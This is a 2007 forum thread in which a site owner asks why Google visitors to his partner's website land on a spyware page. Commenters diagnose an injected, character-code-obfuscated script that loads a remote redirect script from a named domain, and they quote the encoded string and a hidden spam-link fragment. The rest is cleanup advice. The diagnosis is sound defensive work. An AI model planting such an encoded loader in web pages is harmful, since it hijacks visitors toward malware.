Join 3,523 readers in helping fund MetaFilter (Hide)


Can someone explain this mysterious page hijacking in Google?
November 27, 2007 10:40 AM   Subscribe

Can someone explain this mysterious page hijacking in Google search results?

Something really weird is happening involving Mrs. ManInSuit's web site, Google, and maybe some other factor I can't understand.

For some reason, her site has been taken over by some creepy spyware site, but only when linked to through google search results.

Here’s the deal:

- I open Firefox.
- I go to google, and type "Margaux Williamson" (with quotes)
- The first hit is www.margauxwilliamson.com. That's her site.
- I click that link.
- A weird scary spyware site comes up.

What's super strange is- If I just paste www.margauxwilliamson.com into the address box, everything is fine.

I tried it on my computer, and her computer, and phoned a friend to have him try it. We all got the same weird result. (the friend is near by, and on the same ISP, so maybe it's specific to that).

Anyone have any idea what might be the cause of this? I'm baffled!
posted by ManInSuit to Computers & Internet (20 answers total) 1 user marked this as a favorite
 
Oh and - I searched around a bit, and at first though it might be a google-302-hijacking. But it doesn't look like that...
posted by ManInSuit at 10:44 AM on November 27, 2007


Could it be some kind of referrer hack? Someone's hacked into her website and is redirecting people if the referrer (i.e. the page they came from) is Google, but not if the referrer is blank?

There seems to be some weird encoded JavaScript in the source to that page.
posted by TheophileEscargot at 10:49 AM on November 27, 2007


Works fine over here...

Are you using internet explorer? try in firefox, it's probably a "toolbar" that is "assisting" you.

Run spybot/etc and make sure you uninstall any toolbars that programs have helped you out by installing behind your back.

Use Firefox with the noscript extension.
posted by iamabot at 10:51 AM on November 27, 2007


Fascinating. If you look at the source for the page, it decodes the following:
"60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!116!117!110!105!113!117!101!46!105!110!47!105!110!99!108!117!100!101!115!47!106!115!47!115!105!116!101!115!46!106!115!34!62!60!47!115!99!114!105!112!116!62!"
and writes it to the page on load. If you decode that through the fromCharCode() function in javascript, it's embedding http://tunique.in/includes/js/sites.js into the page at load time. If you look at that script, you'll see that it's looking for search engine referers, stripping out the search terms used, and sending visitors off to some spammer with those terms included. You need to wipe that section out of the page (everything between [/head] and [body]), and then figure out how you got compromised in the first place.
posted by Partial Law at 10:53 AM on November 27, 2007 [1 favorite]


Uh yeah, you need to call the sites owner/operator:
Script does a bunch of decoding to hide it's nature from cursory inspection
Then does this:

Decode();
//-->
/SCRIPT>
div style="overflow:auto; visibility:hidden; height: 1px; ">
a href="/new/free/the/index.php">porn girls sex

posted by iamabot at 10:53 AM on November 27, 2007


I get it in Firefox. Two times I got just a parked domain full of ads and the third time I got the scary spyware download attempts.
posted by winston at 10:54 AM on November 27, 2007


Just wanted to say Googling it for me does bring up either a scary spyware dialog box or one of those "what you need when you need it" squatter pages.
posted by ALongDecember at 10:55 AM on November 27, 2007


iamabot - Just tried: it happens in IE too, not just Firefox
posted by ManInSuit at 11:00 AM on November 27, 2007


Yeah, it's my noscript plugin that prevents these kinds of shenanigans.. You have some javascript on the page that is indeed hijacking it.
posted by iamabot at 11:02 AM on November 27, 2007


Partial Law (and others who nailed this):

Wow!! That's crazy.

Let me make sure I have this right:

Someone has hacked my partner's site, and changed the home page in such a way that it redirects to another site *only if* the referer is from google. Yes?

That's amazing.

Why would they do that?

I'll go look at the page and see what I can determine...
posted by ManInSuit at 11:03 AM on November 27, 2007


I get the same wacky redirect in Safari, too.

I've noticed similar things a lot lately with Google results. Clicking on the first results on a lot of searches send me to similar "generic" link sites. It's almost as if these sites are sniffing search requests on Google's end and somehow inserting themselves into the results.
posted by Thorzdad at 11:11 AM on November 27, 2007


Why would they do that?

They are probably hoping that you never check your search results in Google. Potential visitors get redirected, but you would never find out unless you clicked the Google link or heard from someone who did. Just hijacking the page would be much more easily detected.
posted by burnmp3s at 11:12 AM on November 27, 2007


I would guess they would do that so the owner wouldn't notice it was hacked right away, as they would type in the site directly rather than search for it. More likely to stay up that way.
posted by shinynewnick at 11:12 AM on November 27, 2007


Why would they do that?

Because they want to steal as much of your traffic as they can while not alerting you (the site developer/owner) to the fact that your site has been hacked, of course.
posted by ikkyu2 at 11:12 AM on November 27, 2007


Burn, Shiny, Ik = Oh! Of course. That makes sense.


I went to the site and downloaded index.cfm from the ftp server. (The sites on a shared hosting plan Crystaltech. My partner does most of the maintenance herself, and I help a bit...) Yup - there's the offending code, right in the page. (As opposed, to say, added by the server or some weird thing like that).


I'm so not a security expert. I have no idea how the page would have been hacked. (I'm guessing it's some random script, by ftp, catching the only-okay passord)?

I'm also not sure what I do next. I'm guessing:

- Change the ftp password.
- Take the offending code out of the page

Should I inform the ISP, too?
Anything else I should do?
posted by ManInSuit at 11:16 AM on November 27, 2007


I would inform the ISP, in case it was something server related. Although, there is the possibility that they'd take down your site temporarily if it is an extended security risk (complete speculation on my part - no clue about ISP stuff).

Definitely change all passwords, and I would recommend doing a complete fresh upload of the site sooner rather than later. There might be more things hidden in the code across the site.
posted by shinynewnick at 11:24 AM on November 27, 2007 [1 favorite]


I've fixed the pages, changed the passwords, and notified the ISP. Shiny - I'll reupload the site, too.

(For the curious - the old hacked versions of the pages are still there at old_index.cfm and old_index.html)

Thanks everyone for your help!
posted by ManInSuit at 11:53 AM on November 27, 2007


the server should probably be reformatted, chances are the hole is still there. check out snort and tripwire
posted by Mach5 at 3:13 PM on November 27, 2007


It appears to be some co-ordinated exploit.
posted by everichon at 3:39 PM on November 27, 2007


Now that you've fixed your web page, you need to be concerned about whether your computer has been compromised. Time to run anti-virus and anti-malware checkers, I think.
posted by Steven C. Den Beste at 3:50 PM on November 27, 2007


« Older Is this a Philip K Dick story ...   |  How can we get these wooden bl... Newer »
This thread is closed to new comments.